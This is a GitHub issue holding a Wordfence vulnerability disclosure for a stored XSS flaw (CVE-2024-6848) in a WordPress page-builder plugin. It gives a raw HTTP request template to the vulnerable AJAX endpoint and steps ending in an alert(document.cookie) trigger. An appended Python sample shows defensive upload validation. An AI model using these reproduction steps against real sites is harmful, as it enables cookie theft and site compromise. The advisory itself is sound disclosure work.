
Vulnerability - Stored Cross-Site Scripting via File Upload #612

Closed
nicolepaschen opened this issue Jul 18, 2024 · 0 comments · Fixed by #613
@nicolepaschen (Member)
Hello,

We have a new vulnerability to responsibly disclose to you, and the details are outlined below.

Please note that this issue was discovered and responsibly reported to us by wesley (wcraft). Any credit for the discovery of the vulnerability should be granted to them.

Vulnerability Title: Post and Page Builder by BoldGrid Visual Drag and Drop Editor <= 1.26.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via File Upload
CVE ID: CVE-2024-6848
CVSS Severity Score: 6.4 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Organization: Wordfence
Vulnerability Researcher(s): wesley (wcraft)
Software Link(s): https://wordpress.org/plugins/post-and-page-builder

Description
The Post and Page Builder by BoldGrid Visual Drag and Drop Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 1.26.6 due to insufficient input sanitization and output escaping affecting the boldgrid_canvas_image AJAX endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

Proof of Concept
https://doc.clickup.com/9011113249/d/h/8chnb91-7091/2f5466b53f28678

Summary
A Stored Cross-Site Scripting (Contributor+) vulnerability has been identified in the plugin https://wordpress.org/plugins/post-and-page-builder/ <= 1.26.6, through the AJAX endpoint boldgrid_canvas_image.

Steps to Reproduce:
Payload:
Request Raw:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: YOUR_HOST
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://wpcraft.com:1337/wp-admin/edit.php?post_type=bg_block
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: YOUR_COOKIES
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 602

action=boldgrid_canvas_image&boldgrid_gridblock_image_ajax_nonce=YOUR_NONCE&image_data=

  1. Install the plugin https://wordpress.org/plugins/post-and-page-builder/.
  2. Authenticate with a (Contributor+) account.
  3. Go to /wp-admin/post-new.php?post_type=bg_block, open the browser's developer tools, and look in the HTML for the JavaScript variable grid_block_nonce. Note the nonce.
  4. Construct the request using the noted nonce, making sure to use the correct cookies and host, and send the request.
  5. Copy the URL from the response and access it to execute the XSS, triggering an alert(document.cookie).

Any Known Public References
https://plugins.trac.wordpress.org/browser/post-and-page-builder/tags/1.26.6/includes/class-boldgrid-editor-ajax.php#L372
https://wordpress.org/plugins/post-and-page-builder/#developers

Recommended Solution
We recommend sanitizing the contents of files and restricting the types of files that can be uploaded by checking file extensions and MIME types against a whitelist of allowed file types, and validating the file content and metadata provided by the user, such as file size limits and naming conventions.

Uploaded files should be stored securely, preferably outside of the web root directory or within a directory that has restricted access controls. Filenames should be randomly generated to ensure they are unguessable and not susceptible to manipulation by malicious users. Before storing the files, filenames should also be sanitized to remove any special characters or potentially harmful code.


As per our standard disclosure process, we may notify our customers and the general public about this vulnerability according to the timeline outlined here: https://www.wordfence.com/security/. We may confidentially notify interested parties both inside and outside our organization before the announcement date. To avoid an accelerated disclosure timeline, please acknowledge receipt of this report within 14 days.

You should be aware that other researchers may independently discover this vulnerability and announce it prematurely. You should also note that this vulnerability may be exploited in the wild already. For these reasons we encourage you to release a fix as soon as possible to help protect your customers.

As a courtesy we ask that you notify us as soon as you release a fix to your customers. Please let me know if you have any questions.

Tiffany Tyson
Customer Support Engineer
wordfence.com | defiant.com
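The checks the Recommended Solution above asks for, written out as an added example. This is not code from the Post and Page Builder plugin nor part of the Wordfence report; it is a language-agnostic sketch in Python of how a handler for an `image_data` parameter could validate an upload before writing it. It assumes the parameter carries a base64 data URL (an assumption; the report does not show the payload), a raster-only allow-list, a 2 MiB size limit, and a storage directory outside the web root; all of these are placeholders chosen for the example.

```python
"""Hardened handling of an image delivered as a base64 data URL.

Added example: not the plugin's code. Models the defender-side checks the
report recommends: allow-list the type, compare the declared MIME type with
the actual magic bytes, enforce a size limit, refuse SVG (which browsers
render as a document and so can carry script), and store under a random,
unguessable name in a directory outside the web root.
"""
from __future__ import annotations

import base64
import binascii
import os
import re
import secrets
import tempfile

# Allow-listed raster types: declared MIME -> (extension to use, magic bytes).
# SVG is deliberately absent: an SVG served from the upload directory is a
# stored-XSS sink, and sanitizing it is a separate, harder problem.
ALLOWED_TYPES = {
    "image/png": (".png", b"\x89PNG\r\n\x1a\n"),
    "image/jpeg": (".jpg", b"\xff\xd8\xff"),
    "image/gif": (".gif", b"GIF8"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit (2 MiB)

# Assumed wire format: data:<mime>;base64,<payload>
DATA_URL_RE = re.compile(r"^data:([a-z]+/[a-z0-9.+-]+);base64,(.*)$", re.S)


class UploadRejected(ValueError):
    """Raised with a short reason whenever a check fails."""


def parse_data_url(image_data: str) -> tuple[str, bytes]:
    """Split a data URL into (declared mime, decoded bytes), strictly."""
    m = DATA_URL_RE.match(image_data.strip())
    if not m:
        raise UploadRejected("not a base64 data URL")
    try:
        raw = base64.b64decode(m.group(2), validate=True)
    except (binascii.Error, ValueError):
        raise UploadRejected("invalid base64")
    return m.group(1).lower(), raw


def validate_image(image_data: str) -> tuple[str, bytes]:
    """Return (safe extension, bytes) or raise UploadRejected."""
    mime, raw = parse_data_url(image_data)
    if mime not in ALLOWED_TYPES:  # allow-list, not deny-list
        raise UploadRejected(f"type not allowed: {mime}")
    if len(raw) > MAX_BYTES:
        raise UploadRejected("file too large")
    ext, magic = ALLOWED_TYPES[mime]
    if not raw.startswith(magic):  # declared type must match real content
        raise UploadRejected("content does not match declared type")
    return ext, raw


def random_filename(ext: str) -> str:
    """Unguessable name; the extension comes from the allow-list, never the user."""
    return secrets.token_hex(16) + ext


def store_upload(image_data: str, upload_dir: str) -> str:
    """Validate, then write under a random name; returns the stored file name."""
    ext, raw = validate_image(image_data)
    name = random_filename(ext)
    with open(os.path.join(upload_dir, name), "wb") as fh:
        fh.write(raw)
    return name


def check(image_data: str) -> str:
    """'accepted' or 'rejected: <reason>'; handy for logging and tests."""
    try:
        validate_image(image_data)
        return "accepted"
    except UploadRejected as exc:
        return f"rejected: {exc}"


# Constructed sample inputs (not real files): a PNG header plus padding, and
# a minimal SVG document with no script in it.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(16)
SAMPLE_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"></svg>'


def as_data_url(mime: str, raw: bytes) -> str:
    return f"data:{mime};base64," + base64.b64encode(raw).decode("ascii")


def demo() -> str:
    """Store the sample PNG in a temporary directory standing in for a
    location outside the web root; returns the random file name."""
    return store_upload(as_data_url("image/png", SAMPLE_PNG), tempfile.mkdtemp())


if __name__ == "__main__":
    for label, url in [
        ("png", as_data_url("image/png", SAMPLE_PNG)),
        ("svg", as_data_url("image/svg+xml", SAMPLE_SVG)),
        ("svg declared as png", as_data_url("image/png", SAMPLE_SVG)),
    ]:
        print(f"{label}: {check(url)}")
    print("stored as", demo())
```

The three sample cases show why both checks are needed: the SVG is stopped by the allow-list, and the same SVG relabelled as `image/png` is stopped by the magic-byte comparison, so a client-controlled MIME string alone never decides the outcome. Because the extension is taken from the allow-list and the name is random, nothing the user sends reaches the file path.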
